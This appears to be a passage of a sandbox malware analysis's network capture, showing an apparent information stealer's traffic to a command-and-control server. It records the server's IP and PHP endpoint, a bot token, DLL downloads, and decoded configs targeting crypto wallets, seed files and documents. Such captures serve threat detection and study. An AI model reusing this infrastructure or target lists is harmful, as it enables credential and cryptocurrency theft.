                                                                                                                                  Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                  Oct 10, 2024 09:29:02.070833921 CEST92OUTGET /db293a2c1b1c70c4/mozglue.dll HTTP/1.1
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Oct 10, 2024 09:29:02.383569956 CEST1236INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:29:02 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                  ETag: "94750-5e7ebd4425100"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Content-Length: 608080
                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                  Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                  Oct 10, 2024 09:29:02.680716991 CEST93OUTGET /db293a2c1b1c70c4/msvcp140.dll HTTP/1.1
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Oct 10, 2024 09:29:02.904584885 CEST1236INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:29:02 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                  ETag: "6dde8-5e7ebd4425100"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Content-Length: 450024
                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                  Oct 10, 2024 09:29:03.217636108 CEST89OUTGET /db293a2c1b1c70c4/nss3.dll HTTP/1.1
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Oct 10, 2024 09:29:03.449822903 CEST1236INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:29:03 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                  ETag: "1f3950-5e7ebd4425100"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Content-Length: 2046288
                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                  Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                  Oct 10, 2024 09:29:04.924128056 CEST93OUTGET /db293a2c1b1c70c4/softokn3.dll HTTP/1.1
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Oct 10, 2024 09:29:05.142164946 CEST1236INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:29:05 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                  ETag: "3ef50-5e7ebd4425100"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Content-Length: 257872
                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                  Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                  Oct 10, 2024 09:29:05.306900024 CEST97OUTGET /db293a2c1b1c70c4/vcruntime140.dll HTTP/1.1
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Oct 10, 2024 09:29:05.524607897 CEST1236INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:29:05 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                  ETag: "13bf0-5e7ebd4425100"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Content-Length: 80880
                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                  Oct 10, 2024 09:29:06.099863052 CEST201OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary=----KKECBFCGIEGCBGCAECGC
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Content-Length: 1067
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Oct 10, 2024 09:29:06.378448009 CEST202INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:29:06 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Content-Length: 0
                                                                                                                                  Keep-Alive: timeout=5, max=84
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Oct 10, 2024 09:29:06.432045937 CEST467OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHI
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Content-Length: 267
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 2d 2d 0d 0a
                                                                                                                                  Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="message"wallets------FCAFIJJJKEGIECAKKEHI--
                                                                                                                                  Oct 10, 2024 09:29:06.653141975 CEST1236INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:29:06 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Content-Length: 2408
                                                                                                                                  Keep-Alive: timeout=5, max=83
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                                                                  Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                                                                                  Oct 10, 2024 09:29:06.656204939 CEST465OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIE
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Content-Length: 265
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 2d 2d 0d 0a
                                                                                                                                  Data Ascii: ------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="message"files------DAAAFBKECAKEHIEBAFIE--
                                                                                                                                  Oct 10, 2024 09:29:06.876915932 CEST1195INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:29:06 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Content-Length: 968
                                                                                                                                  Keep-Alive: timeout=5, max=82
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 55 6b 56 44 66 43 56 53 52 55 4e 46 54 6c 51 6c 58 48 77 71 4c 6e 52 34 64 43 77 71 4c 6d 52 76 59 33 67 73 4b 69 35 34 62 48 4e 34 66 44 56 38 4d 58 77 78 66 44 42 38 52 45 39 44 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 4c 6e 52 34 64 43 77 71 4c 6d 52 76 59 33 67 73 4b 69 35 34 62 48 4e 34 66 44 56 38 4d 58 77 78 66 44 42 38 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 4d 48 78 45 52 56 4e 4c 66 43 56 45 52 56 4e 4c 56 45 39 51 4a 56 78 38 4b 6d 56 34 62 32 52 31 63 79 6f 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 35 6e 4c 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 6b 5a 69 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 62 6d 63 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 52 6d 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 62 6d 63 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 6b 5a 69 77 71 62 57 56 30 59 57 31 68 63 32 73 71 4c 69 6f 73 4b 6c 56 55 51 79 [TRUNCATED]
                                                                                                                                  Data Ascii: UkVDfCVSRUNFTlQlXHwqLnR4dCwqLmRvY3gsKi54bHN4fDV8MXwxfDB8RE9DfCVET0NVTUVOVFMlXHwqLnR4dCwqLmRvY3gsKi54bHN4fDV8MXwxfDB8REVTS3wlREVTS1RPUCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8MHxERVNLfCVERVNLVE9QJVx8KmV4b2R1cyosKndhbGxldCoucG5nLCp3YWxsZXQqLnBkZiwqYmFja3VwKi5wbmcsKmJhY2t1cCoucGRmLCpyZWNvdmVyKi5wbmcsKnJlY292ZXIqLnBkZiwqbWV0YW1hc2sqLiosKlVUQy0tKi4qfDE1MDB8MXwxfDB8RE9DfCVET0NVTUVOVFMlXHwqZXhvZHVzKiwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8MHxSRUN8JVJFQ0VOVCVcfCpleG9kdXMqLCp3YWxsZXQqLnBuZywqd2FsbGV0Ki5wZGYsKmJhY2t1cCoucG5nLCpiYWNrdXAqLnBkZiwqcmVjb3ZlcioucG5nLCpyZWNvdmVyKi5wZGYsKm1ldGFtYXNrKi4qLCpVVEMtLSouKnwxNTAwfDF8MXwwfE5PVEVQQUR8JUFQUERBVEElXE5vdGVwYWQrK1x8Ki54bWx8MTB8MXwxfDB8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXGJhY2t1cFx8Ki4qfDEwfDF8MXwwfFNVQkxJTUV8JUFQUERBVEElXFN1YmxpbWUgVGV4dCAzXExvY2FsXFNlc3Npb24uc3VibGltZV9zZXNzaW9uXHwqLnN1YmxpbWVfKnwxMHwxfDF8MHw=
                                                                                                                                  Oct 10, 2024 09:29:06.886674881 CEST181OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary=----
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Content-Length: 1663
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Oct 10, 2024 09:29:07.313518047 CEST202INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:29:07 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Content-Length: 0
                                                                                                                                  Keep-Alive: timeout=5, max=81
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Oct 10, 2024 09:29:07.324336052 CEST181OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary=----
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Content-Length: 1380
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Oct 10, 2024 09:29:07.668416977 CEST493INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:29:07 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Content-Length: 266
                                                                                                                                  Keep-Alive: timeout=5, max=80
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 36 32 2e 32 30 34 2e 34 31 2e 31 37 36 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at 62.204.41.176 Port 80</address></body></html>
                                                                                                                                  Oct 10, 2024 09:29:07.676366091 CEST181OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary=----
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Content-Length: 1380
